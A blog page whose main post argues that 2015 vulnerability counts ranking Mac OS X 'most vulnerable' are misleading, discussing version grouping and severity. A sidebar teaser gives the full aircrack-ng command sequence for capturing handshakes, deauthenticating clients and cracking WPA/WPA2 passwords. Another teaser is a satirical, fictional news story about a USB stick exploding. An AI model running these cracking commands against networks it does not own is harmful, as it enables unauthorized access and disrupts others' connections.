Skip to main content

Was Mac OS X really the most vulnerable in 2015?

Image
By

Much has been said in the security world about the recent release of data on vulnerabilities discovered in 2015. Due to the way this data has been presented, many news outlets have been reporting that Mac OS X was the “most vulnerable” OS in 2015. But was it really?
It turns out, there are some issues with the way the data is presented and the conclusions that are being drawn from that presentation. The table shows Mac OS X at the top, with 384 vulnerabilities, and iOS in a close second with 374. Well below that are different versions of Windows, with the worst being Windows Server 2012, in 10th place with 155 vulnerabilities, a mere 40 percent of the vulnerabilities of OS X.
Therein lies the first issue with this data, however. All versions of OS X are clumped together in one group, while different versions of Windows are broken down and shown separately. This means that comparing the numbers in that table does not amount to comparing apples to apples, so to speak.
If we look into the data a little more closely, it is possible to group vulnerabilities by vendor. Doing that, we see that Apple had a total of 654 vulnerabilities in 2015, while Microsoft had 571. Throwing Adobe into the mix, it achieves third place at 460 vulnerabilities.
This is a slightly more useful number, as it includes all versions of each company’s systems as well as their web browsers (Safari and Internet Explorer). However, this includes the vulnerabilities for iOS, while it’s unclear to me whether any Windows mobile systems are included in the Windows vulnerability counts.
Still, even those numbers are not particularly meaningful as-is. Comparing them is like comparing the number of hits made by two different baseball teams in a season without considering how many of those hits were foul balls, grounders, home runs, etc. One team may have a higher number of hits than another, but if they hit a lot more foul balls, while the team with fewer hits had a higher proportion of home runs and RBIs (runs batted in), the higher number of hits is revealed as a misleading statistic.
Similarly, vulnerabilities come in all kinds. There are relatively minor vulnerabilities that can’t really do much harm, and then there are the ones that allow a remote attacker to fully compromise your machine. Fortunately, each vulnerability in the data set is given a severity rating between 0.0 and 10.0. With some filtering, it’s possible to see all the vulnerabilities for each platform that were very severe (higher than 9).
Doing so turns up some interesting results. Apple, it turns out, had 91 vulnerabilities of this severity in 2015, a mere 14 percent of their total vulnerabilities. Microsoft, however, had 332 very severe vulnerabilities, at 58 percent of their total. Adobe leads both with a whopping 389 very severe vulnerabilities, almost 85 percent of their total.
This tells us more clearly about the severity of the vulnerabilities in the data, which is a more important metric than just how many total vulnerabilities there are.
Now, don’t get me wrong… I’m not trying to say that Apple’s systems are the most secure systems on the planet. Although the number of highly dangerous vulnerabilities is interesting, there’s still a lot left out.apple-iphone-smartphone-desk
For example, how many of the vulnerabilities were actually exploited by malware in the wild? There’s no way to know, barring another source of information or a lot of research. It doesn’t matter that Apple’s counts of dangerous vulnerabilities are lower if they got exploited more frequently than the competition.
There’s also no information about existing vulnerabilities. As an example, there are no new vulnerabilities listed for Windows XP. However, there are existing, unfixed vulnerabilities in Windows XP, and many people still use that, despite the fact that Microsoft has discontinued support for it. These won’t show up, but it would still be fair to count them if we’re trying to put some kind of number on how vulnerable Windows users as a whole are.
The same is probably true of Mac OS X 10.6 (aka Snow Leopard), which is no longer supported by Apple but has known vulnerabilities. That should also count against Apple, and although I don’t know for sure (due to the way the Mac OS X data was categorized), I’m guessing there are probably no Snow Leopard vulnerabilities in the 2015 data.
Plus, there could very well be minor vulnerabilities in the systems that were listed that were found in 2014 but haven’t been fixed yet. Such things do happen, and that would be particularly interesting to examine, since it would give insight into the delay between discovery of a vulnerability and patching it for each vendor.
So, bottom line, I’d advise you to ignore any click-bait headlines about how Mac OS X is the “most vulnerable system” based on this data. As I’ve shown, if you look at the data in a different way, you could come to a very different – but still probably inaccurate – conclusion. Ultimately, based solely on vulnerability counts, there’s no valid way to say whether Apple or Microsoft win the “most vulnerable” award, and any attempt to do so is extremely misleading.

Comments

Post a Comment

Popular posts from this blog

Building a smarter home

By
The Jetsons  presented a highly entertaining vision of what  homes  of the future would  look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s  homes  and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019,  companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...
Post a Comment
Read more

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court

By
A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action. When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation. The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint. In July the case suffered a setback when an Austrian regional co...
Post a Comment
Read more

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

By
In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng  sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0  airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up  Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.
Post a Comment
Read more

Oculus’ New $99 Samsung Gear VR Makes Serious Virtual Reality Affordable

By
At half the price of its last mobile VR headset, the new $99  Oculus-made  Samsung Gear VR is cheap enough to unlock virtual reality for the mainstream. Revealed today at the Oculus Connect conference, it works with the whole 2015 line of Samsung Smartphones including the Note 5, S6, S6 Edge, and S6 Edge+. It will ship in November in time for Black Friday. Compared to the $199 previous Gear VRs that only worked with fewer phones, this headset will be a lot more accessible. The new Gear VR is 22% lighter, making it more comfortable to wear. The trackpad on the temple of the headset also now has a tactile directional pad on it so your finger will know where it’s touching. The previous Gear VRs had a smooth trackpad and sometimes it was to tough to know if you were touching it or just the unsensitive shell of the headset when you couldn’t see for yourself. There’s also a new Gear VR Gamepad which all the Oculus Connect conference attendees will get for free. It features an...
Post a Comment
Read more

Careless USB removal causes multiple deaths

By
EIGHTEEN workers have died after a USB stick was removed from a computer without adequate precautions. The offices of Hereford-based Envision Photography were completely destroyed in the ensuing blast. Survivor Norman Steele said: “My colleague Helen had put some files on the stick to work on at home, and she yanked it out of the computer before anyone could scream ‘no’. “I kicked her aside as a jet of white-hot flame belched out of the USB port and set fire to the desk opposite. “Grabbing her, I dived through the window just before all the PCs in the network exploded with purple electricity that fried everyone in the building. “I sprinted to my car, knowing that the printers were already becoming merciless hunter-killer drones, shouting for Helen to follow. “But when I looked round I saw her frozen, something glowing in her hand, the awareness dawning of her fate. She was still holding the USB. “She detonated in a flash of ultraviolet light that turned eve...
Post a Comment
Read more